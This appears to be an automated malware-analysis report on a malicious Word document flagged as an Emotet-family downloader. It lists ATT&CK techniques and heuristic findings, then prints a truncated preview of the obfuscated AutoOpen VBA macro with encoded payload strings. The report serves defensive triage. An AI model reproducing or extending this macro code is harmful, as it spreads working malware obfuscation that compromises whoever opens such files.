MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1105 Ingress Tool Transfer
The sample is a malicious Office document containing a VBA macro. The macro utilizes CreateObject and an AutoOpen function, indicating it's designed to execute automatically upon opening. Heuristics and ClamAV detection confirm its malicious nature, likely acting as a downloader for a second-stage payload. The VBA code is heavily obfuscated, but the presence of AutoOpen and CreateObject strongly suggests an attempt to download and execute further malicious content.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44801 bytes |
SHA-256: 9116429904e02b1f2d1101d2fac17bb5a1e3a0c2d267e87f091b60b453748568 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 15 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VmrEAdp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "bKGSuNdRcUfLIP"
Function nYNsBuoMwrjIj()
On Error Resume Next
Select Case XrCsJQ
Case 77040
FGJZuW = Hex(93528 - CSng(62748) - 86605 + ChrW(wwXAo))
pMowf = Vpfjf
End Select
WanXHST = cqCPY("%zu DUAYQAwAGIAZQBkAGQAOQBiAGUAZgA2AGUANgAzMp", 5, 39)
Select Case iaMlWd
Case 9721
udLmuJ = Hex(83569 - CSng(67187) - 39039 + ChrW(aWDmCz))
pOwkUu = rBwSD
End Select
Select Case chRivV
Case 56984
adqMh = Hex(17310 - CSng(59893) - 82193 + ChrW(SBpnY))
uTZjn = ndiChZ
End Select
rXSHztahw = cqCPY("lEAwADEAZABlADYANwBhADgAZQBmAGIAMQA2AGIAMQA3AGEAMwA0ADYANgA0ADMANAAxAGMAZgA0AGMAZQBjADgAYQBmAGQAOQBjAGUAYgBiADAAZgBjADYAZ1PVsu", 3, 119)
Select Case WUzJI
Case 20192
zLuiA = Hex(24707 - CSng(31893) - 12282 + ChrW(XqpEU))
OWmqZ = AHJAjS
End Select
Select Case LQATBm
Case 49401
IoWEV = Hex(53969 - CSng(79582) - 95844 + ChrW(uUZtJ))
LmkUu = QucqnI
End Select
vVKUHTSwRk = cqCPY("DjADEANQBmADgAOQA2AGUAZAAxADkAYQAyAGMAMAA5ADAANwAwAGEAZAAwADAAMgA0C1j.8", 2, 65)
Select Case qCMFz
Case 86743
ztMKB = Hex(43481 - CSng(64887) - 42742 + ChrW(LzsBP))
jRRfUs = uNhTaH
End Select
Select Case EoMWi
Case 97575
irWVU = Hex(54290 - CSng(74976) - 40476 + ChrW(QDSDj))
OfKTtK = iSpaX
End Select
UbKjzbWlzs = cqCPY("huuPkQA1ADYANQBjADUAYwBlADAAZgBjADQANABiADAAMAA4TzP", 6, 42)
Select Case nsEfwz
Case 93302
NGXDa = Hex(96476 - CSng(3605) - 75297 + ChrW(TbiJZj))
LEKdI = juEEh
End Select
Select Case Gpoii
Case 28559
jozNIO = Hex(40008 - CSng(5033) - 64807 + ChrW(hHPinB))
tQnRY = dKBjWd
End Select
AqnINiGiEz = cqCPY("uEEANgA1ADUAYQBmADkAMwBkADkANQBmAGYANwAzADMANQBlADAAOQA2AGUAZgA4AGi7z0U", 3, 64)
Select Case KIlchJ
Case 96034
LvCaJ = Hex(55013 - CSng(16487) - 94616 + ChrW(tTojp))
bPLMU = HiwZF
End Select
Select Case pNEOOu
Case 38376
ZkcQvR = Hex(18272 - CSng(32257) - 91644 + ChrW(COrWI))
qdpJi = XPEbGh
End Select
qQiSA = cqCPY("fcGQANwBmAGQANABmADUAMgBjADAANwA0ADMAYgBmAGEANwBhADQANwA1AGQAYwAwADIAMgAzADkAZAA3AGEANgAwAGUAZQA5ADIAMwA5ADMAMgBlADYAMQA0ADQANQBiADMAZAA0ADIAZQBkAGMANwA5AGG%4o.X", 3, 153)
Select Case uhnskA
Case 92905
bipXYP = Hex(48362 - CSng(65890) - 44395 + ChrW(SEuYlF))
FoMML = LckBh
End Select
Select Case qjBLG
Case 52462
juVFm = Hex(60853 - CSng(11349) - 90836 + ChrW(hGlLIl))
ILJli = IGQzh
End Select
FhpprmO = cqCPY("oUADUAZgA4ADkAZgBhADEAZABiAGYAMwAxADcAMgA5AGUAZABmADIAMwBhADEAZABkADEAMwA0ADYAMwBmAD%nXb", 3, 82)
Select Case QzUiGj
Case 84842
HVLAP = Hex(91201 - CSng(65234) - 53622 + ChrW(dVsEU))
zwqaKm = opwYf
End Select
Select Case kzUuwT
Case 30000
kjJtv = Hex(63677 - CSng(10809) - 42198 + ChrW(kQuqwA))
hoQSo = LawBzo
End Select
LJWYErWz = cqCPY("lAOQAzAGEAZAA1ADYAZgAxAGEAMwA0AGIAZABiAGMAOQAwAGEAMQAwAGMAMAAwADYAYwA3ADYAMgA1ADUAZAA0AGYAZAA5AGUANgBiAGUAYQA0ADMAOABjADUAMABlADMAMwA3AGEANQBkADMnzR9z", 2, 144)
Select Case wRFSV
Case 58400
UMjpu = Hex(91514 - CSng(680) - 9228 + ChrW(SDnww))
IDwiJ = iwuiR
End Select
Select Case znrIzs
Case 71905
ZUdAk = Hex(1168 - CSng(45519) - 97778 + ChrW(noJduY))
hdifCv = CjIlJ
End Select
NSiIZDoDK = cqCPY("GPQAZgBiADYAMAAzADcANQAzADQAYgAwADMANAA1ADAAYwBiADMAMQAzADkAMQAzADUAYQAyADAAZQAzADAAZQBjAD1FPHK", 3, 88)
Select Case HHWhrW
Case 78275
vDNTXw = Hex(6994 - CSng
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.